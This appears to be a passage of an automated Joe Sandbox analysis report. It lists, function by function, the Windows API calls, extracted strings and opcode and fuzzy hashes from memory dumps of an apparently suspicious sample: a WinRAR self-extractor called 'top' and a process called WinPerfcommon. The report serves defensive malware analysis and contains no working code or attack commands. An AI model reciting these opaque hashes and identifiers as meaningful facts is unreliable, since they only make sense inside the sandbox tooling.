• Opcode ID: b6035f5aacb36f86a5cd86e5d50d0a348ba99cf9a56a8c6ceb5150fabb13aaef
• Instruction ID: 32260f16410688bad821462ba2d67830afe80ff96c47917e893e28aab2b50773
• Opcode Fuzzy Hash: b6035f5aacb36f86a5cd86e5d50d0a348ba99cf9a56a8c6ceb5150fabb13aaef
• Instruction Fuzzy Hash: 77014E7530430A6FD7306F24DC42B7A7358EB41751F20043FFB42926A1DEA96C85432D
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcschr
• String ID: <9H$?*<>|"
• API String ID: 2691759472-1860354782
• Opcode ID: f2b7421f891b29e0088891a0403d84489f3986c5eb583d941953ff606f59a3c9
• Instruction ID: 8eeb89696faa748856d16a7c9d690dc58014227d96667fa9fba8063f538c3a0d
• Opcode Fuzzy Hash: f2b7421f891b29e0088891a0403d84489f3986c5eb583d941953ff606f59a3c9
• Instruction Fuzzy Hash: 62F0D653545301C9C7302EA85841737B3E4DF91B26F34481FE9C4873C3E6AD88C9865D
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: Software\WinRAR SFX$F
                                                                  • API String ID: 176396367-620974218
                                                                  • Opcode ID: 1d23f7000b948b4673f05efff3f5bb00af9eec70b0bdb669c09a4d766377f15e
                                                                  • Instruction ID: cdb0c1fd5d4d5c178a063c2fe03a6c6649a90a64e00c73e6982b613fd6eb3efe
                                                                  • Opcode Fuzzy Hash: 1d23f7000b948b4673f05efff3f5bb00af9eec70b0bdb669c09a4d766377f15e
                                                                  • Instruction Fuzzy Hash: 38017131900118BADF21AF52DC09FDB7F7CEF44795F000067B54991060E7B45A98CBE9
                                                                  APIs
                                                                    • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00461FE5
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00461FF6
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00462006
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00462014
                                                                    • Part of subcall function 00461FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0045B371,?,?,00000000,?,?,?), ref: 0046202F
                                                                    • Part of subcall function 0046AC04: SetCurrentDirectoryW.KERNELBASE(?,0046AE72,C:\Users\user\Desktop,00000000,0049946A,00000006), ref: 0046AC08
                                                                  • _wcslen.LIBCMT ref: 0046AE8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CompareCurrentDirectoryString
                                                                  • String ID: <F$C:\Users\user\Desktop
                                                                  • API String ID: 521417927-3598875323
                                                                  • Opcode ID: ea99ac955b9877f943f3d3b80cbaebbad4dd50a99232e23f6a728c8d0993a9d3
                                                                  • Instruction ID: 8152bf2c5362889a7acc97343d0ee29dc9ae2143e671f738edb50677e6b92ac7
                                                                  • Opcode Fuzzy Hash: ea99ac955b9877f943f3d3b80cbaebbad4dd50a99232e23f6a728c8d0993a9d3
                                                                  • Instruction Fuzzy Hash: C0015271D4021855DF11ABA5DD0AEDF72BCAF08309F00046BF506E3191F6B896548FAA
                                                                  APIs
                                                                    • Part of subcall function 004797E5: GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
                                                                    • Part of subcall function 004797E5: _free.LIBCMT ref: 0047981C
                                                                    • Part of subcall function 004797E5: SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
                                                                    • Part of subcall function 004797E5: _abort.LIBCMT ref: 00479863
                                                                  • _abort.LIBCMT ref: 0047BB80
                                                                  • _free.LIBCMT ref: 0047BBB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_abort_free
                                                                  • String ID: pH
                                                                  • API String ID: 289325740-1451419334
                                                                  • Opcode ID: 1c1520466e4f26bc35f56f6b397b257de6924eda45779950c8c4bc9af2f93bdb
                                                                  • Instruction ID: 991b3ecd26670fa6ef0ac9851cd72a055000f9b50fe7e649e9a8eb2c01a8f0ac
                                                                  • Opcode Fuzzy Hash: 1c1520466e4f26bc35f56f6b397b257de6924eda45779950c8c4bc9af2f93bdb
                                                                  • Instruction Fuzzy Hash: FE018E31D016219BCB22AF6AD8012AEB760FB04B24B14851FED6867A95CB2C7D018BCD
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Malloc
                                                                  • String ID: (F$ZF
                                                                  • API String ID: 2696272793-210782626
                                                                  • Opcode ID: 053855ebd2f35403fb42910017ce578806a6d7189fbe934e135d1af2b718630c
                                                                  • Instruction ID: 8ef0da9171d1da951830beb3f363f661d1390a1631c84b6e47ad9d23edbcbf16
                                                                  • Opcode Fuzzy Hash: 053855ebd2f35403fb42910017ce578806a6d7189fbe934e135d1af2b718630c
                                                                  • Instruction Fuzzy Hash: FB0169B6640108FF9F059FB1DC49CEEBBADEF08345700026AF906D7120EB31AA44DBA4
                                                                  APIs
                                                                    • Part of subcall function 0047BF30: GetEnvironmentStringsW.KERNEL32 ref: 0047BF39
                                                                    • Part of subcall function 0047BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047BF5C
                                                                    • Part of subcall function 0047BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047BF82
                                                                    • Part of subcall function 0047BF30: _free.LIBCMT ref: 0047BF95
                                                                    • Part of subcall function 0047BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047BFA4
                                                                  • _free.LIBCMT ref: 004782AE
                                                                  • _free.LIBCMT ref: 004782B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                  • String ID: 0"K
                                                                  • API String ID: 400815659-2643911354
                                                                  • Opcode ID: 829f08be957931de4782c047e83b6482fc8e31bbc70693cbd34e9df9a1763f5d
                                                                  • Instruction ID: 3cd8e1c014685eafb7eeb51b7d93044f1fec5c178f34b4fac7336cce0df47191
                                                                  • Opcode Fuzzy Hash: 829f08be957931de4782c047e83b6482fc8e31bbc70693cbd34e9df9a1763f5d
                                                                  • Instruction Fuzzy Hash: 00E0A03268594249A2A5323B2C0A6EB16008B9133DB54829FF918D71C3DE5C880604AF
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00461206,?), ref: 00460FEA
                                                                  • GetLastError.KERNEL32(?), ref: 00460FF6
                                                                    • Part of subcall function 00456C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00456C54
                                                                  Strings
                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00460FFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                  • API String ID: 1091760877-2248577382
                                                                  • Opcode ID: 4c2bbf7cb3b015b6cb45b59d544b36232e77fbbe692b229f1122945e5988c396
                                                                  • Instruction ID: 892079132a5c2396ca432771af07ffb4648384804d5f52f5c77f8d6f513350a7
                                                                  • Opcode Fuzzy Hash: 4c2bbf7cb3b015b6cb45b59d544b36232e77fbbe692b229f1122945e5988c396
                                                                  • Instruction Fuzzy Hash: 0BD02B3160413136CA2137289C06D6F3C048B12733BA10B2EF538516F6CB1D0981539E
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0045DA55,?), ref: 0045E2A3
                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0045DA55,?), ref: 0045E2B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FindHandleModuleResource
                                                                  • String ID: RTL
                                                                  • API String ID: 3537982541-834975271
                                                                  • Opcode ID: 652b7cbc6236281e4158740995b845b1052499cdc019027641c6f72ed6e6db90
                                                                  • Instruction ID: 9c43fdb9be9163b7d49edb8d1bac322214ab7d015f83003ee0044965198e61b1
                                                                  • Opcode Fuzzy Hash: 652b7cbc6236281e4158740995b845b1052499cdc019027641c6f72ed6e6db90
                                                                  • Instruction Fuzzy Hash: AEC0123124471066E6342B657C0DB4B6A585B01F13F05085DB541E92D5D6A9C94497A4
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E467
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: UF$zF
                                                                  • API String ID: 1269201914-4175919442
                                                                  • Opcode ID: 48f9888b768225f141e0b57c3efe528e37d132874e70986150292f6eec6901a5
                                                                  • Instruction ID: 1120317dc96016ca66926d59843b6cd3dd675aa14e38c62a10486238411a8989
                                                                  • Opcode Fuzzy Hash: 48f9888b768225f141e0b57c3efe528e37d132874e70986150292f6eec6901a5
                                                                  • Instruction Fuzzy Hash: 44B012D92990007C310431271D02C3B025CC6C0F11330C43FF600D1086FD4C0E02083F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E467
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: pF$zF
                                                                  • API String ID: 1269201914-254565063
                                                                  • Opcode ID: 870b5589d40a4c93bdb17955b4d6424b452c917384de7bb00fbfaef6a3efb260
                                                                  • Instruction ID: 57ce3cc6e8b17c8d7a6a86a3023ce9292988947bb1147f035c379447e7e0a9d7
                                                                  • Opcode Fuzzy Hash: 870b5589d40a4c93bdb17955b4d6424b452c917384de7bb00fbfaef6a3efb260
                                                                  • Instruction Fuzzy Hash: 55B012C925A040BC3244B1271C02D3B018CC5C4B51330C43FF804C2081FD4C4C01093F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5X_H
                                                                  • API String ID: 0-3241812158
                                                                  • Opcode ID: 3ee324956cdc18e52985d729705f5d24f542cd07b6b610469ce856c5a3e62788
                                                                  • Instruction ID: 30d2220a3d7ede962d506d58835333ce81d8dce59959b5e17346d3a1e8b383f6
                                                                  • Opcode Fuzzy Hash: 3ee324956cdc18e52985d729705f5d24f542cd07b6b610469ce856c5a3e62788
                                                                  • Instruction Fuzzy Hash: 2A91D075D1DA899FE789EB6888293B97FE0FBA6750F0400BBC009D72D2DB791814C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bce981914e56a4366f2e83c415112c588366048c715235c4dfe0d650d9a06a1b
                                                                  • Instruction ID: 0df655171a4afb84a67f67252ca2a2817c5a34390539fc349c1476a4a20fc12d
                                                                  • Opcode Fuzzy Hash: bce981914e56a4366f2e83c415112c588366048c715235c4dfe0d650d9a06a1b
                                                                  • Instruction Fuzzy Hash: 1E51CF71A18A499EE788EB6CD8697B97FE0FB9A7A0F50017BC009D33D2CBB914118740
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: 6109a50c7992df7b13f5edd77445e74f6352b26d15c240caab0565189ce61814
                                                                  • Instruction ID: a67d816186ba85fd39cb26922e47317edf5312b684bfe182c478480cecb09365
                                                                  • Opcode Fuzzy Hash: 6109a50c7992df7b13f5edd77445e74f6352b26d15c240caab0565189ce61814
                                                                  • Instruction Fuzzy Hash: 8CF028367299468BC7027B7DF8414E57744EB97176BE401BBD504C72A2E211186EC7D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X_L
                                                                  • API String ID: 0-1612919207
                                                                  • Opcode ID: 6ddcd9217b358cb2d114baa350fab37645abff4bc12f73c8244420c87060386f
                                                                  • Instruction ID: b3b89efe7145da7b5f699cb8b914464e214bdb49385b74a39e2f1b6bc226247e
                                                                  • Opcode Fuzzy Hash: 6ddcd9217b358cb2d114baa350fab37645abff4bc12f73c8244420c87060386f
                                                                  • Instruction Fuzzy Hash: DAC18330A18A5D8FDB98EF18D8999B9B3F2FF59714B1441A9D00EC7296DA35FC42CB40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J3I
                                                                  • API String ID: 0-2906232164
                                                                  • Opcode ID: bd85f05fd314bd573340b4626708e4203e28718d5927c26bbec4878bb3c5349d
                                                                  • Instruction ID: 5f8aff97c1ea39fd469f722f6cbe9e24a6d9ef0b5c227c98b6ea18ea7cb2bc5c
                                                                  • Opcode Fuzzy Hash: bd85f05fd314bd573340b4626708e4203e28718d5927c26bbec4878bb3c5349d
                                                                  • Instruction Fuzzy Hash: 3F916C3180C5C9CFE778EE18D8565B4B7E0FF4A3B0B0412FAD58EC7593D928A8168B81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (T3I
                                                                  • API String ID: 0-3558621861
                                                                  • Opcode ID: aa39e97080995c85916c61365f41fd318bef684dfc2416bfa357df562d710333
                                                                  • Instruction ID: 3351a2d192a43a3d1366ac33d1dc3b5aca9cb39165fb3b92e50b2540c92d0d54
                                                                  • Opcode Fuzzy Hash: aa39e97080995c85916c61365f41fd318bef684dfc2416bfa357df562d710333
                                                                  • Instruction Fuzzy Hash: D071D330D1D68E8EEB65EF6888546BDBBF1FF4A794F1401BAC00ED7186EE286841C741
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @H3I
                                                                  • API String ID: 0-1068681053
                                                                  • Opcode ID: b89fb33618f081d8ed7fafc0c310262ca8af75f5dbee1a768912e55222514293
                                                                  • Instruction ID: c186f4ccf6a983c689f6a8094db26794d5bcd40375372d4bac0423d1eff8ee84
                                                                  • Opcode Fuzzy Hash: b89fb33618f081d8ed7fafc0c310262ca8af75f5dbee1a768912e55222514293
                                                                  • Instruction Fuzzy Hash: 1571C130D1DA8ACFD768EF18C4505BEBBB1FF99350F1056BAD00AD72C6DE28A9058742
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: cdeb1bd86ed07aff4232dc9fa2207644930ea809e58513014d55db845ac0c7d2
                                                                  • Instruction ID: 92a2b2b0bf56069d4cabf1980b5bc858ef7a2ad921268cff00e124dc7670df5c
                                                                  • Opcode Fuzzy Hash: cdeb1bd86ed07aff4232dc9fa2207644930ea809e58513014d55db845ac0c7d2
                                                                  • Instruction Fuzzy Hash: 12515B70D0C69A9FDB6DEF98C4546BDBBB1FF4A350F1055BAC00AE7296CA386901CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 10ff1ab6b709ca572c5493b747343e02ef2b8f1973d0aeba6ab07f11eeb1c501
                                                                  • Instruction ID: 1a91f7901cd7bc895379e569d8460fc329481e6897601c142ba40b659afecb13
                                                                  • Opcode Fuzzy Hash: 10ff1ab6b709ca572c5493b747343e02ef2b8f1973d0aeba6ab07f11eeb1c501
                                                                  • Instruction Fuzzy Hash: 32516B30D0C58A9FEB69EFA8D4555FDFBB1FF4A354F5050BAC00AA7286CA382901CB51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `I
                                                                  • API String ID: 0-1172803333
                                                                  • Opcode ID: 9634a8196a2b5d4c518292d338ec42a72823a2dd0d8b3f4f2cab3c6b40665f02
                                                                  • Instruction ID: c85eb26ec05665b9bbe72034459c4938ddcd2c6a4ceaab972caf6c71634bfdd0
                                                                  • Opcode Fuzzy Hash: 9634a8196a2b5d4c518292d338ec42a72823a2dd0d8b3f4f2cab3c6b40665f02
                                                                  • Instruction Fuzzy Hash: 4F316E31E1CA5A8FDB58EB68D4A19A8F7E1FF49750B145139D01EC3282CF24BC51CB84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pb3I
                                                                  • API String ID: 0-1517376500
                                                                  • Opcode ID: 28ae9aa53aa3a4af70a3aa948fdb6a273e69b0cb2c3aec1ed64d1d3c4f157de0
                                                                  • Instruction ID: a2f2debd0d5a699fbdf23094d0ff896669718831eeb7c7df84c52a69edb86254
                                                                  • Opcode Fuzzy Hash: 28ae9aa53aa3a4af70a3aa948fdb6a273e69b0cb2c3aec1ed64d1d3c4f157de0
                                                                  • Instruction Fuzzy Hash: FC112631E0CA8E5FEB74AE6888491BDA7E1EF5F3A0F41013AD04DE3281DD643C068781
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f7fb9a4a67325dbfa05fa05d727d0fe53118c0d5b29e50b133b6552b1474e92
                                                                  • Instruction ID: edf6cc469e974aff15f5cc374eba807fd7465bdcc5b27f9bfeed100ce785a278
